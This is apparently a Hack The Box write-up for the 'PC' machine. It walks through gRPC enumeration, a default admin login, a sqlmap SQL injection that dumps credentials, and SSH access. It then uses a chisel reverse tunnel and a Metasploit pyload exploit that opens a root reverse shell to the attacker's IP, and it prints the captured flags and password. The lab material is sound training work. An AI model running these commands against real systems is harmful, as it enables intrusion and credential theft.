HTB - PC [Easy]
Scan
> TARGET=10.129.227.81 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
50051/tcp open unknown syn-ack ttl 63
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port50051-TCP:V=7.93%I=7%D=5/21%Time=6469DD30%P=x86_64-pc-linux-gnu%r(N
SF:ULL,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x0
SF:6\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(Generic
SF:Lines,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(GetRe
SF:quest,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(HTTPO
SF:ptions,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0
SF:\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RTSP
SF:Request,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\
SF:0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RPC
SF:Check,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(DNSVe
SF:rsionBindReqTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\
SF:xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0
SF:")%r(DNSStatusRequestTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0
SF:\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\
SF:0\0\?\0\0")%r(Help,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0
SF:\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\
SF:0\0")%r(SSLSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x0
SF:5\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0
SF:\?\0\0")%r(TerminalServerCookie,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xf
SF:f\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0
SF:\0\0\0\0\0\?\0\0")%r(TLSSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?
SF:\xff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x0
SF:8\0\0\0\0\0\0\?\0\0")%r(Kerberos,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\x
SF:ff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\
SF:0\0\0\0\0\0\?\0\0")%r(SMBProgNeg,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\x
SF:ff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\
SF:0\0\0\0\0\0\?\0\0")%r(X11Probe,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff
SF:\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\
SF:0\0\0\0\0\?\0\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Investigate the port
50051
└─# nc -vn 10.129.227.81 50051
(UNKNOWN) [10.129.227.81] 50051 (?) open
▒?��?�� ?@Did not receive HTTP/2 settings before handshake timeout
> curl --http2 http://10.129.227.81:50051
curl: (1) Received HTTP/0.9 when not allowed
> curl --http0.9 http://10.129.227.81:50051 -o-
▒?��?�� ?
- Several evidence leads to
gRPC server, installgrpcurland try again
└─# ~/go/bin/grpcurl -plaintext 10.129.227.81:50051 list
SimpleApp
grpc.reflection.v1alpha.ServerReflection
└─# ~/go/bin/grpcurl -plaintext 10.129.227.81:50051 list SimpleApp
SimpleApp.LoginUser
SimpleApp.RegisterUser
SimpleApp.getInfo
User: sau
- Using
grpcuican open a webui
─# ~/go/bin/grpcui -plaintext 10.129.227.81:50051
gRPC Web UI available at http://127.0.0.1:43395/
[GFX1-]: Unrecognized feature ACCELERATED_CANVAS2D
Missing chrome or resource URL: resource://gre/modules/UpdateListener.jsm
Missing chrome or resource URL: resource://gre/modules/UpdateListener.sys.mjs
- Register a user and login using the webui
# login
POST /invoke/SimpleApp.LoginUser HTTP/1.1
{"metadata":[],"data":[{"username":"test","password":"test"}]}
## response
{
"headers": [
{
"name": "content-type",
"value": "application/grpc"
},
{
"name": "grpc-accept-encoding",
"value": "identity, deflate, gzip"
}
],
"error": null,
"responses": [
{
"message": {
"message": "Your id is 645."
},
"isError": false
}
],
"requests": {
"total": 1,
"sent": 1
},
"trailers": [
{
"name": "token",
"value": "b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NDY3MTcxMX0.GMGXLmyShXPHP8gOU5XDkEbPgZ4b60iZIoZERfhUB3Y'"
}
]
}
- Then can add a header
tokento query/invoke/SimpleApp.getInfo
POST /invoke/SimpleApp.getInfo HTTP/1.1
{"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NDY3MTcxMX0.GMGXLmyShXPHP8gOU5XDkEbPgZ4b60iZIoZERfhUB3Y"}],"data":[{"id":"1"}]}
## response
{
"headers": [
{
"name": "content-type",
"value": "application/grpc"
},
{
"name": "grpc-accept-encoding",
"value": "identity, deflate, gzip"
}
],
"error": null,
"responses": [
{
"message": {
"message": "The admin is working hard to fix the issues."
},
"isError": false
}
],
"requests": {
"total": 1,
"sent": 1
},
"trailers": []
}
- There is a user called
admin, can login asadmin:admin
└─# curl http://kali:43395/invoke/SimpleApp.LoginUser -d '{"metadata":[],"data":[{"username":"admin","password":"admin"}]}' -H 'Cookie: _grpcui_csrf_token=iiqIdGFElShuDFWaLRu-scnvErn9lDNWNfTLwbjO4xE' -H 'x-grpcui-csrf-token: iiqIdGFElShuDFWaLRu-scnvErn9lDNWNfTLwbjO4xE' -H 'Content-Type: application/json'
{
"headers": [
{
"name": "content-type",
"value": "application/grpc"
},
{
"name": "grpc-accept-encoding",
"value": "identity, deflate, gzip"
}
],
"error": null,
"responses": [
{
"message": {
"message": "Your id is 863."
},
"isError": false
}
],
"requests": {
"total": 1,
"sent": 1
},
"trailers": [
{
"name": "token",
"value": "b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODQ2NzMxMTN9.1UjkoGoHlYgGVL99budVUjEebim1WKK0A142A8pvj4c'"
}
]
}
- SQLi exists on
id
└─# sqlmap -u http://kali:43395/invoke/SimpleApp.getInfo -H 'Cookie: _grpcui_csrf_token=aaa' -H 'x-grpcui-csrf-token: aaa' -H 'Content-Type: application/json' --data '{"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODQ2NzQ2MTN9.6SLB2bFqdMdDHDGK3kUR3RuwqKTN8KpJpomW2eIpqX8"}],"data":[{"id":"1*"}]}' --dump
[07:22:16] [INFO] table 'SQLite_masterdb.messages' dumped to CSV file '/root/.local/share/sqlmap/output/kali/dump/SQLite_masterdb/messages.csv'
[07:22:16] [INFO] fetching columns for table 'accounts'
[07:22:16] [INFO] fetching entries for table 'accounts'
[07:22:18] [INFO] retrieved: 'admin','admin'
[07:22:19] [INFO] retrieved: 'HereIsYourPassWord1431','sau'
- login as
sauvia ssh to get the user flag
└─# ssh sau@10.129.227.81
sau@10.129.227.81's password:
Last login: Mon May 15 09:00:44 2023 from 10.10.14.19
sau@pc:~$ ls
user.txt
sau@pc:~$ cat user.txt
d9c6a8eaf9a127019c2c882188355e5f
PE: root
- upload linpeas and find some open ports
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9666 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::50051 :::* LISTEN -
- upload chisel to forward ports
# kali
> chisel server -p 9999 --reverse
# target
> chisel client --max-retry-count=1 10.10.16.59:9999 R:8000:localhost:8000 R:9666:localhost:9666
- Browse the app (either on 8000 or 9666) and learnt it’s
pyload - https://www.rapid7.com/db/modules/exploit/linux/http/pyload_js2py_exec/
msf6 > use exploit/linux/http/pyload_js2py_exec
msf6 exploit(linux/http/pyload_js2py_exec) > set RHOSTS 127.0.0.1
msf6 exploit(linux/http/pyload_js2py_exec) > set LHOST 10.10.16.59
msf6 exploit(linux/http/pyload_js2py_exec) > set TARGET 0
msf6 exploit(linux/http/pyload_js2py_exec) > set payload cmd/unix/reverse
msf6 exploit(linux/http/pyload_js2py_exec) > run
[*] Started reverse TCP double handler on 10.10.16.59:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/reverse
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo NQpaM695yOwowJQe;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "NQpaM695yOwowJQe\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.16.59:4444 -> 10.129.227.81:39022) at 2023-05-21 07:45:51 -0400
shell
[*] Trying to find binary 'python' on the target machine
[-] python not found
[*] Trying to find binary 'python3' on the target machine
id
[*] Found python3 at /usr/bin/python3
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /usr/bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
root@pc:~/.pyload/data# cat /root/root.txt
cat /root/root.txt
954ba7074ecdb8cddb857055039e8b3b
root@pc:~/.pyload/data#
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack